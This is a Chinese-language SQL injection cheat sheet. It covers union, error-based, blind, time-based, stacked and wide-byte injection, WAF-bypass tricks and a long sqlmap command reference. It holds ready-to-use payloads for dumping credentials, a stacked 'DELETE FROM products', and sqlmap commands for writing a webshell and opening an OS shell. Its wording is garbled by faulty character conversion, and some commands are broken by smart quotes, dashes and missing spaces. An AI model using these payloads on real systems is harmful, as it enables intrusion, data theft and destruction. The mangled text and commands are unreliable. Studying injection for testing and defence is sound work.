SQL總結

SQL注入分類

依據注入點類型分類

• 數字類型的注入
  • 在 Web 端大概是 http://xxx.com/news.php?id=1 這種形式，其注入點 id 類型爲數字，因此叫數字型注入點。這一類的 SQL 語句原型大概爲 select * from 表名 where id=1。組合出來的sql注入語句爲：select * from news where id=1 and 1=1
• 字符串類型的注入
  • 在 Web 端大概是 http://xxx.com/news.php?name=admin 這種形式，其注入點 name 類型爲字符類型，因此叫字符型注入點。這一類的 SQL 語句原型大概爲 select * from 表名 where name='admin'。注意多了引號。組合出來的sql注入語句爲：select * from news where chr='admin' and 1=1 ' '
• 搜索型注入

  • 這是一類特殊的注入類型。這類注入主要是指在進行數據搜索時沒過濾搜索參數，通常在連接地址中有「keyword=關鍵字」，有的不顯示在的連接地址裏面，而是直接經過搜索框表單提交。此類注入點提交的 SQL 語句，其原形大體爲：select * from 表名 where 字段 like '%關鍵字%'。組合出來的sql注入語句爲：select * from news where search like '%測試 %' and '%1%'='%1%'。測試%' union select 1,2,3,4 and '%'='。

依據提交方式分類

• GET注入
  • 提交數據的方式是 GET , 注入點的位置在 GET 參數部分。好比有這樣的一個連接http://xxx.com/news.php?id=1 , id 是注入點。
• POST注入
  • 使用 POST 方式提交數據，注入點位置在 POST 數據部分，常發生在表單中。
• COOKIE注入
  • HTTP 請求的時候會帶上客戶端的 Cookie, 注入點存在 Cookie 當中的某個字段中。
• HTTP頭注入(XFF注入、UA注入、REFERER注入）
  • 注入點在 HTTP 請求頭部的某個字段中。好比存在 User-Agent 字段中。嚴格講的話，Cookie 其實應該也是算頭部注入的一種形式。由於在 HTTP 請求的時候，Cookie 是頭部的一個字段。

依據獲取信息的方式分類

• 聯合查詢注入
  • 可使用union的狀況下的注入。
• 基於報錯的注入
  • 即頁面會返回錯誤信息，或者把注入的語句的結果直接返回在頁面中。把查詢語句與報錯信息拼接，一塊兒顯示出來。
• 基於布爾的盲注
  • 便可以根據返回頁面判斷條件真假的注入。
• 基於時間的盲注
  • 即不能根據頁面返回內容判斷任何信息，用條件語句查看時間延遲語句是否執行（即頁面返回時間是否增長）來判斷。
• 堆查詢注入
  • 能夠同時執行多條語句的執行時的注入。

聯合查詢注入

1.判斷注入點

2.判斷注入點類型

3.判斷查詢列數

order by 函數是對MySQL中查詢結果按照指定字段名進行排序，除了指定字 段名還能夠指定字段的欄位進行排序，第一個查詢字段爲1，第二個爲2，依次類推。咱們能夠經過二分法來猜解列數。輸入 order by 4 #  發現頁面錯誤，說明沒有4列；輸入3列時，頁面正常，說明有3列。

4.判斷顯示位

?id=-1' union select 1,2,3--+

UNION的做用是將兩個select查詢結果合併。

5.獲取數據庫名

?id=-1' union select 1,2,database()--+  查看當前數據庫
?id=-1' union select 1,2,schema_name from information_schema.schemata limit 0,1--+  查看數據庫 ；       
?id=-1’ union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 查看全部的數據庫；

6.獲取表名

?id=-1' unionselect1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1--+ 查表；   
?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+查看全部的表；

7.獲列名

?id=-1' union select 1,2,column_name from information_schema.columns where table_name=0x7573657273--+  查詢字段信息；
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+查看全部的字段信息；

8.獲取列中的信息

?id=-1‘ union select 1,2,concat_ws(’~‘,username,password) from security.users limit 1,1--+  查詢一個信息；
?id=-1’ union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+  查詢全部信息。

報錯注入

報錯注入在無法用union聯合查詢時用，但前提仍是不能過濾一些關鍵的函數。報錯注入就是利用了數據庫的某些機制，人爲地製造錯誤條件，使得查詢結果可以出如今錯誤信息中。

id=1‘ and updatexml(1,concat(0x7e,(database())),1) or ’1‘=‘1 報錯出數據庫；

id=1‘ and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),1) or ’1‘=‘1 查詢全部的數據庫，使用limit進行逐個查詢。

經常使用的報錯語句模板：

1. 經過floor報錯

and (select 1 from (select count(*),concat(( payload),floor (rand(0)*2))x from information_schema.tables group by x)a)

其中payload爲你要插入的SQL語句

須要注意的是該語句將 輸出字符長度限制爲64個字符

2. 經過updatexml報錯

and updatexml(1, payload,1)

一樣該語句對輸出的字符長度也作了限制，其最長輸出32位

而且該語句對payload的反悔類型也作了限制，只有在payload返回的不是xml格式纔會生效

3. 經過ExtractValue報錯

and extractvalue(1, payload)

輸出字符有長度限制，最長32位。

布爾盲注

盲注與其餘注入有所不一樣，普通注入查詢正確會返回結果。而在盲注的sql查詢中，服務器只會返回是，不是兩種回答，所以就給咱們的注入帶來了麻煩，手工盲注的工做量是普通注入的幾十倍之多，通常來講咱們採用自動化注入工具，如sqlmap來實現。

id=1‘ and ascii(substr((select database()),1,1)) > 16--+

id=1‘ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >17 --+先經過大於號或者小於號來判斷數據庫的第一個字母是哪個；

id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1)) = 115--+此時能夠驗證數據庫中第五個數據庫的第一個字母是s

id=1‘ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),1,1)) >11 --+判斷security數據庫中的第4個表中的數據的第一位是否大於11；

id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),1,1)) =117 --+驗證數據庫中第4個表中的數據的第一位的第一個字母的ascii碼是不是117，也就是 u。

時間盲注

Timing Attack注入，也就是時間盲注。經過簡單的條件語句好比 and 1=2 是沒法看出異常的。

在MySQL中，有一個Benchmark() 函數，它是用於測試性能的。Benchmark(count,expr) ，這個函數執行的結果，是將表達式 expr 執行 count 次 。所以，利用benchmark函數，可讓同一個函數執行若干次，使得結果返回的時間比平時要長，經過時間長短的變化，能夠判斷注入語句是否執行成功。這是一種邊信道攻擊，這個技巧在盲注中被稱爲Timing Attack，也就是時間盲注。

利用前提：頁面上沒有顯示位，也沒有輸出 SQL 語句執行錯誤信息。正確的 SQL 語句和錯誤的 SQL 語句返回頁面都同樣，可是加入 sleep(5)條件以後，頁面的返回速度明顯慢了 5 秒。

http://127.0.0.1/sqli/Less-1/?id=1' and sleep(5) --+//判斷是否存在延時注入

id=1‘ and sleep(5)--+ 使用延遲的方法判斷是否存在注入漏洞；

id=1‘ and if(length(database()) = 8,1,sleep(5))--+當爲8的時候很快加載，而爲其餘值得時候加載較慢（5s左右），那就說明此時數據庫的長度就是8（security）；

id=1' and if(ascii(substr((select database()),1,1)) >113,1,sleep(5))--+若是當前數據庫的第一個字母的ascii值大於113的時候，會馬上返回結果，不然執行5s；

id=1‘ and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>112,1,sleep(5))--+同理判斷數據庫中的第5個數據庫的第一位的ascii的值是否是大於112（實際中是115），若是是的則速度返回，不然延時5s返回結果；

堆疊注入

在SQL中，分號（;）是用來表示一條sql語句的結束。試想一下咱們在 ; 結束一個sql語句後繼續構造下一條語句，會不會一塊兒執行？所以這個想法也就造就了堆疊注入。而union injection（聯合注入）也是將兩條語句合併在一塊兒，二者之間有什麼區別麼？區別就在於union 或者union all執行的語句類型是有限的，能夠用來執行查詢語句，而堆疊注入能夠執行的是任意的語句。例如如下這個例子。用戶輸入：1; DELETE FROM products服務器端生成的sql語句爲：（因未對輸入的參數進行過濾）Select * from products where productid=1;DELETE FROM products當執行查詢後，第一條顯示查詢信息，第二條則將整個表進行刪除。

寬字節注入

寬字節注入是因爲不一樣編碼中中英文所佔字符的不一樣所致使的。一般來講，在GBK編碼當中，一個漢字佔用2個字節。而在UTF-8編碼中，一個漢字佔用3個字節。在php中，咱們能夠經過輸入 echo strlen("中") 來測試，當爲GBK編碼時，輸入2，而爲UTF-8編碼時，輸出3。除了GBK之外，全部的ANSI編碼都是中文都是佔用兩個字節。

經常使用符號

空格 :%20

單引號: %27

#: %23

\ :%5C

字符集 

ASCII 編碼：單字節編碼

latin1 編碼：單字節編碼

gbk 編碼：一個字符佔1個字節**，兩個字節以上叫寬字節**，設置「set character_set_client=gbk」（gbk編碼設置），一般致使編碼轉換的注入問題，尤爲是使用php 鏈接mysql數據庫的時候，一個gbk漢字佔兩個字節，取值範圍是（編碼位數）：第一個字節是（129-254），第二個字節（64-254），當設置gbk編碼後，遇到連續兩個字節，都符合gbk取值範圍，會自動解析爲一個漢字
UTF-8 編碼：使用一至四字節編碼， 0x00–0x7F 範圍內是一位，和 ASCII 保持一致。其它字符用二至四個字節變長表示。 因爲ASCII表示的字符只有128個，所以網絡世界的規範是使用UNICODE編碼，可是用ASCII表示的字符使用UNICODE並不高效。所以出現了中間格式字符集，被稱爲通用轉換格式，及UTF(UniversalTransformation Format)。

二次注入

二次注入漏洞是一種在Web應用程序中普遍存在的安全漏洞形式。相對於一次注入漏洞而言，二次注入漏洞更難以被發現，可是它卻具備與一次注入攻擊漏洞相同的攻擊威力。

一、黑客經過構造數據的形式，在瀏覽器或者其餘軟件中提交HTTP數據報文請求到服務端進行處理，提交的數據報文請求中可能包含了黑客構造的SQL語句或者命令。

二、服務端應用程序會將黑客提交的數據信息進行存儲，一般是保存在數據庫中，保存的數據信息的主要做用是爲應用程序執行其餘功能提供原始輸入數據並對客戶端請求作出響應。

三、黑客向服務端發送第二個與第一次不相同的請求數據信息。

四、服務端接收到黑客提交的第二個請求信息後，爲了處理該請求，服務端會查詢數據庫中已經存儲的數據信息並處理，從而致使黑客在第一次請求中構造的SQL語句或者命令在服務端環境中執行。

五、服務端返回執行的處理結果數據信息，黑客能夠經過返回的結果數據信息判斷二次注入漏洞利用是否成功

cookie注入

注入字段在cookie數據中

1.判斷字段數

order by

2.union select 聯合查詢，獲取表名

0‘ union select 1，group_concat(table_name),3  from information_schema.tables  where table_schema = database() --+

3. union select 聯合查詢，獲取列名

0' union select 1, group_concat(column_name),3 from information_schema.columns  where  table_name = 'uisers' --+

4. union select 聯合查詢，獲取字段值

0' union select 1, group_concat(username,0x3a,password),3 from users --+

SQL注入繞過

基本繞過方法

1. 大小寫
2. 雙寫
3. 編碼（URL編碼、十六進制編碼、Unicode編碼、ascii編碼）
4. 內聯註釋（把一些特有的僅在MYSQL上的語句放在 /*!...*/ 中，這樣這些語句若是在其它數據庫中是不會被執行，但在MYSQL中會執行）

空格繞過

1. 用註釋替換空格select/**/user,password/**/from /**/users;
2. 空格url編碼%20
3. 兩個空格代替一個空格
4. 用Tab代替空格
5. %a0=空格
6. 若是空格被過濾，括號沒有被過濾，能夠用括號繞過select(user())from dual where(1=1)and(2=2)
7. 回車

引號繞過

1.使用十六進制

例如：select column_name from information_schema.columns where table_name='users'

如引號被過濾，就能夠嘗試使用十六進制來進行繞過

便可以將語句寫爲：select column_name from information_schema.columns where table_name=0x7573657273;

2.已經得知數據庫名稱和表名

select column_name from information_schema.columns where table_schema=database();

查詢所在數據庫中的全部列名，猜想哪些字段在哪一個表中，

select username,password from users;

3.寬字節注入

逗號繞過

在使用盲注的時候，須要使用到substr(),mid(),limit,這些子句方法都須要使用到逗號

1.對於substr()和mid()這兩個方法可使用from的方式來解決：

select substr(database() from 1 for 1);

2.使用join

union select 1,2 可使用下面的句子代替

union select * from (select 1)a join (select 2)b

3.使用like

select ascii(mid(user(),1,1))=80 可使用下面的句子代替

select user() like 'r%'

4.limit中，使用offset繞過

limit 1offset0

or and xor not繞過

1. 利用符號替換and = && or=|| xor=| not=!
2. 在敏感詞中添加註釋：an/**/d
3. 雙寫繞過oorr
4. 大小寫變形
5. 編碼

註釋符繞過

1. id=1' union select 1,2,3 or '1'='1或者：id=1' union select 1,2,'3
2. 最後添加or 1'
3. 最後添加 and '1'='1

=繞過

1. 使用like
2. 使用!<>,<>是不等於
3. regrep (正則表達匹配)

<>被過濾

1. greatest(),least()
2. strcmp(str1,str2),第一個參數小於第二個參數，返回-1，不然爲1
3. in，between a and b

等價函數

hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()

union select 繞過

SQL注入攻擊流程

1.判斷注入點

• 易出現SQL注入的功能點：凡是和數據庫有交互的地方都容易出現SQL注入，SQL注入常常出如今登錄頁面、涉及獲取HTTP頭（user-agent / client-ip等）的功能點及訂單處理等地方。例如登錄頁面，除常見的萬能密碼，post 數據注入外也有可能發生在HTTP頭中的 client-ip 和 x-forward-for 等字段處。這些字段是用來記錄登錄的 i p的，有可能會被存儲進數據庫中從而與數據庫發生交互致使sql注入。
• 先加單引號'、雙引號"、單括號）、雙括號））等看看是否報錯，若是報錯就可能存在SQL注入漏洞。
• 在URL後面加 and 1=1返回正常，and 1=2錯誤，則存在SQL注入漏洞。
• Timing Attack測試，即時間盲注。有時候經過簡單的條件語句好比 and 1=2 是沒法看出異常的。在MySQL中，有一個Benchmark() 函數，它是用於測試性能的。Benchmark(count,expr) ，這個函數執行的結果，是將表達式 expr 執行 count 次 。所以，利用benchmark函數，可讓同一個函數執行若干次，使得結果返回的時間比平時要長，經過時間長短的變化，能夠判斷注入語句是否執行成功。這是一種邊信道攻擊，這個技巧在盲注中被稱爲Timing Attack，也就是時間盲注。

2.判斷注入點類型

數字型注入點

http://host/test.php?id=100 and 1=1 返回成功
http://host/test.php?id=100 and 1=2 返回失敗

字符型注入點

http://host/test.php?name=man' and '1'='1 返回成功
http://host/test.php?name=man' and '1'='2返回失敗

搜索型注入點

http://host//test.php?keyword=python%' and 1=1 and '%'='
http://host//test.php?keyword=python%' and 1=2 and '%'='

3.獲取數據庫數據

mysql數據庫

在mysql以上的版本中，爲了方便管理，默認定義了information_schema數據庫，用來存儲數據庫元信息，其中具備表schema(數據庫名）、tables(表名)、columns(列名或字段名)

在schama表中，  schema_name 字段用來存儲數據庫名

在tables表中，     table_schema和table_name 分別用來存儲數據庫名和表名

在columns表中， tables_schema(數據庫名）、table_name(表名)、column_name(列名或字段名)

sql數據庫增刪改查

insert   into    table_name(列名1，列名2)  values (值1，值2)

update 表名字  set  列名稱 = 新值  where  列名稱 = 舊值

delete  from   表名  where  列名稱 = 值

mysql經常使用的聚合函數

user()          查看當前Mysql登陸用戶名

database()     查看當前使用Mysql數據庫名

version()        查看當前Mysql版本

limit 關鍵字  limit m n  從m行開始，向下n個結束

sqlmap簡介

sqlmap支持五種不一樣的注入模式：

• 一、基於布爾的盲注，便可以根據返回頁面判斷條件真假的注入。
• 二、基於時間的盲注，即不能根據頁面返回內容判斷任何信息，用條件語句查看時間延遲語句是否執行（即頁面返回時間是否增長）來判斷。
• 三、基於報錯注入，即頁面會返回錯誤信息，或者把注入的語句的結果直接返回在頁面中。
• 四、聯合查詢注入，可使用union的狀況下的注入。
• 五、堆查詢注入，能夠同時執行多條語句的執行時的注入。

sqlmap支持的數據庫有

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

檢測注入

基本格式

sqlmap -u 「http://www.vuln.cn/post.php?id=1」

默認使用level1檢測所有數據庫類型

sqlmap -u 「http://www.vuln.cn/post.php?id=1」  –dbms mysql –level 3

指定數據庫類型爲mysql，級別爲3（共5級，級別越高，檢測越全面）

跟隨302跳轉

當注入頁面錯誤的時候，自動跳轉到另外一個頁面的時候須要跟隨302，
當注入錯誤的時候，先報錯再跳轉的時候，不須要跟隨302。
目的就是：要追蹤到錯誤信息。

cookie注入

當程序有防get注入的時候，可使用cookie注入
sqlmap -u 「http://www.baidu.com/shownews.asp」 –cookie 「id=11」 –level 2（只有level達到2纔會檢測cookie）

從post數據包中注入

可使用burpsuite或者temperdata等工具來抓取post包

sqlmap -r 「c:\tools\request.txt」 -p 「username」 –dbms mysql    指定username參數

注入成功後

獲取數據庫基本信息

sqlmap -u 「http://www.vuln.cn/post.php?id=1」  –dbms mysql –level 3 –dbs

查詢有哪些數據庫

sqlmap -u 「http://www.vuln.cn/post.php?id=1」  –dbms mysql –level 3 -D test –tables

查詢test數據庫中有哪些表

sqlmap -u 「http://www.vuln.cn/post.php?id=1」  –dbms mysql –level 3 -D test -T admin –columns

查詢test數據庫中admin表有哪些字段

sqlmap -u 「http://www.vuln.cn/post.php?id=1」  –dbms mysql –level 3 -D test -T admin -C 「username,password」 –dump

dump出字段username與password中的數據

其餘命令參考下面

從數據庫中搜索字段

sqlmap -r 「c:\tools\request.txt」 –dbms mysql -D dedecms –search -C admin,password
在dedecms數據庫中搜索字段admin或者password。

讀取與寫入文件

首先找須要網站的物理路徑，其次須要有可寫或可讀權限。

–file-read=RFILE 從後端的數據庫管理系統文件系統讀取文件 （物理路徑）
–file-write=WFILE 編輯後端的數據庫管理系統文件系統上的本地文件 （mssql xp_shell）
–file-dest=DFILE 後端的數據庫管理系統寫入文件的絕對路徑
#示例：
sqlmap -r 「c:\request.txt」 -p id –dbms mysql –file-dest 「e:\php\htdocs\dvwa\inc\include\1.php」 –file-write 「f:\webshell\1112.php」

使用shell命令：

sqlmap -r 「c:\tools\request.txt」 -p id –dms mysql –os-shell
接下來指定網站可寫目錄：
「E:\php\htdocs\dvwa」

#注：mysql不支持列目錄，僅支持讀取單個文件。sqlserver能夠列目錄，不能讀寫文件，但須要一個（xp_dirtree函數）

sqlmap詳細命令：

• –is-dba 當前用戶權限（是否爲root權限）
• –dbs 全部數據庫
• –current-db 網站當前數據庫
• –users 全部數據庫用戶
• –current-user 當前數據庫用戶
• –random-agent 構造隨機user-agent
• –passwords 數據庫密碼
• –proxy http://local:8080 –threads 10 (能夠自定義線程加速) 代理
• –time-sec=TIMESEC DBMS響應的延遲時間（默認爲5秒）

——————————————————————————————————

Options（選項）：

• –version 顯示程序的版本號並退出
• -h, –help 顯示此幫助消息並退出
• -v VERBOSE 詳細級別：0-6（默認爲1）
• 保存進度繼續跑：

sqlmap -u 「http://url/news?id=1「 –dbs-o 「sqlmap.log」 保存進度
sqlmap -u 「http://url/news?id=1「 –dbs-o 「sqlmap.log」 –resume 恢復已保存進度

Target（目標）：

如下至少須要設置其中一個選項，設置目標URL。

• -d DIRECT 直接鏈接到數據庫。
• -u URL, –url=URL 目標URL。
• -l LIST 從Burp或WebScarab代理的日誌中解析目標。
• -r REQUESTFILE 從一個文件中載入HTTP請求。
• -g GOOGLEDORK 處理Google dork的結果做爲目標URL。
• -c CONFIGFILE 從INI配置文件中加載選項。

Request（請求）：

這些選項能夠用來指定如何鏈接到目標URL。

• –data=DATA 經過POST發送的數據字符串
• –cookie=COOKIE HTTP Cookie頭
• –cookie-urlencode URL 編碼生成的cookie注入
• –drop-set-cookie 忽略響應的Set – Cookie頭信息
• –user-agent=AGENT 指定 HTTP User – Agent頭
• –random-agent 使用隨機選定的HTTP User – Agent頭
• –referer=REFERER 指定 HTTP Referer頭
• –headers=HEADERS 換行分開，加入其餘的HTTP頭
• –auth-type=ATYPE HTTP身份驗證類型（基本，摘要或NTLM）(Basic, Digest or NTLM)
• –auth-cred=ACRED HTTP身份驗證憑據（用戶名:密碼）
• –auth-cert=ACERT HTTP認證證書（key_file，cert_file）
• –proxy=PROXY 使用HTTP代理鏈接到目標URL
• –proxy-cred=PCRED HTTP代理身份驗證憑據（用戶名：密碼）
• –ignore-proxy 忽略系統默認的HTTP代理
• –delay=DELAY 在每一個HTTP請求之間的延遲時間，單位爲秒
• –timeout=TIMEOUT 等待鏈接超時的時間（默認爲30秒）
• –retries=RETRIES 鏈接超時後從新鏈接的時間（默認3）
• –scope=SCOPE 從所提供的代理日誌中過濾器目標的正則表達式
• –safe-url=SAFURL 在測試過程當中常常訪問的url地址
• –safe-freq=SAFREQ 兩次訪問之間測試請求，給出安全的URL

Enumeration（枚舉）：

這些選項能夠用來列舉後端數據庫管理系統的信息、表中的結構和數據。此外，您還能夠運行
您本身的SQL語句。

• -b, –banner 檢索數據庫管理系統的標識
• –current-user 檢索數據庫管理系統當前用戶
• –current-db 檢索數據庫管理系統當前數據庫
• –is-dba 檢測DBMS當前用戶是否DBA
• –users 枚舉數據庫管理系統用戶
• –passwords 枚舉數據庫管理系統用戶密碼哈希
• –privileges 枚舉數據庫管理系統用戶的權限
• –roles 枚舉數據庫管理系統用戶的角色
• –dbs 枚舉數據庫管理系統數據庫
• -D DBname 要進行枚舉的指定數據庫名
• -T TBLname 要進行枚舉的指定數據庫表（如：-T tablename –columns）
• –tables 枚舉的DBMS數據庫中的表
• –columns 枚舉DBMS數據庫表列
• –dump 轉儲數據庫管理系統的數據庫中的表項
• –dump-all 轉儲全部的DBMS數據庫表中的條目
• –search 搜索列（S），表（S）和/或數據庫名稱（S）
• -C COL 要進行枚舉的數據庫列
• -U USER 用來進行枚舉的數據庫用戶
• –exclude-sysdbs 枚舉表時排除系統數據庫
• –start=LIMITSTART 第一個查詢輸出進入檢索
• –stop=LIMITSTOP 最後查詢的輸出進入檢索
• –first=FIRSTCHAR 第一個查詢輸出字的字符檢索
• –last=LASTCHAR 最後查詢的輸出字字符檢索
• –sql-query=QUERY 要執行的SQL語句
• –sql-shell 提示交互式SQL的shell

Optimization（優化）：

這些選項可用於優化SqlMap的性能。

• -o 開啓全部優化開關
• –predict-output 預測常見的查詢輸出
• –keep-alive 使用持久的HTTP（S）鏈接
• –null-connection 從沒有實際的HTTP響應體中檢索頁面長度
• –threads=THREADS 最大的HTTP（S）請求併發量（默認爲1）

Injection（注入）：

這些選項能夠用來指定測試哪些參數， 提供自定義的注入payloads和可選篡改腳本。

• -p TESTPARAMETER 可測試的參數（S）
• –dbms=DBMS 強制後端的DBMS爲此值
• –os=OS 強制後端的DBMS操做系統爲這個值
• –prefix=PREFIX 注入payload字符串前綴
• –suffix=SUFFIX 注入payload字符串後綴
• –tamper=TAMPER 使用給定的腳本（S）篡改注入數據

Detection（檢測）：

這些選項能夠用來指定在SQL盲注時如何解析和比較HTTP響應頁面的內容。

• –level=LEVEL 執行測試的等級（1-5，默認爲1）
• –risk=RISK 執行測試的風險（0-3，默認爲1）
• –string=STRING 查詢時有效時在頁面匹配字符串
• –regexp=REGEXP 查詢時有效時在頁面匹配正則表達式
• –text-only 僅基於在文本內容比較網頁

Techniques（技巧）：

這些選項可用於調整具體的SQL注入測試。

• –technique=TECH SQL注入技術測試（默認BEUST）
• –time-sec=TIMESEC DBMS響應的延遲時間（默認爲5秒）
• –union-cols=UCOLS 定列範圍用於測試UNION查詢注入
• –union-char=UCHAR 用於暴力猜解列數的字符

Fingerprint（指紋）：

• -f, –fingerprint 執行檢查普遍的DBMS版本指紋

Brute force（蠻力）：

這些選項能夠被用來運行蠻力檢查。

• –common-tables 檢查存在共同表
• –common-columns 檢查存在共同列

User-defined function injection（用戶自定義函數注入）：
這些選項能夠用來建立用戶自定義函數。

–udf-inject 注入用戶自定義函數
–shared-lib=SHLIB 共享庫的本地路徑

File system access（訪問文件系統）：

這些選項能夠被用來訪問後端數據庫管理系統的底層文件系統。

• –file-read=RFILE 從後端的數據庫管理系統文件系統讀取文件
• –file-write=WFILE 編輯後端的數據庫管理系統文件系統上的本地文件
• –file-dest=DFILE 後端的數據庫管理系統寫入文件的絕對路徑

Operating system access（操做系統訪問）：

這些選項能夠用於訪問後端數據庫管理系統的底層操做系統。

• –os-cmd=OSCMD 執行操做系統命令
• –os-shell 交互式的操做系統的shell
• –os-pwn 獲取一個OOB shell，meterpreter或VNC
• –os-smbrelay 一鍵獲取一個OOB shell，meterpreter或VNC
• –os-bof 存儲過程緩衝區溢出利用
• –priv-esc 數據庫進程用戶權限提高
• –msf-path=MSFPATH Metasploit Framework本地的安裝路徑
• –tmp-path=TMPPATH 遠程臨時文件目錄的絕對路徑

Windows註冊表訪問：

這些選項能夠被用來訪問後端數據庫管理系統Windows註冊表。

• –reg-read 讀一個Windows註冊表項值
• –reg-add 寫一個Windows註冊表項值數據
• –reg-del 刪除Windows註冊表鍵值
• –reg-key=REGKEY Windows註冊表鍵
• –reg-value=REGVAL Windows註冊表項值
• –reg-data=REGDATA Windows註冊表鍵值數據
• –reg-type=REGTYPE Windows註冊表項值類型

這些選項能夠用來設置一些通常的工做參數。

• -t TRAFFICFILE 記錄全部HTTP流量到一個文本文件中
• -s SESSIONFILE 保存和恢復檢索會話文件的全部數據
• –flush-session 刷新當前目標的會話文件
• –fresh-queries 忽略在會話文件中存儲的查詢結果
• –eta 顯示每一個輸出的預計到達時間
• –update 更新SqlMap
• –save file保存選項到INI配置文件
• –batch 從不詢問用戶輸入，使用全部默認配置。

Miscellaneous（雜項）：

• –beep 發現SQL注入時提醒
• –check-payload IDS對注入payloads的檢測測試
• –cleanup SqlMap具體的UDF和表清理DBMS
• –forms 對目標URL的解析和測試形式
• –gpage=GOOGLEPAGE 從指定的頁碼使用谷歌dork結果
• –page-rank Google dork結果顯示網頁排名（PR）
• –parse-errors 從響應頁面解析數據庫管理系統的錯誤消息
• –replicate 複製轉儲的數據到一個sqlite3數據庫
• –tor 使用默認的Tor（Vidalia/ Privoxy/ Polipo）代理地址
• –wizard 給初級用戶的簡單向導界面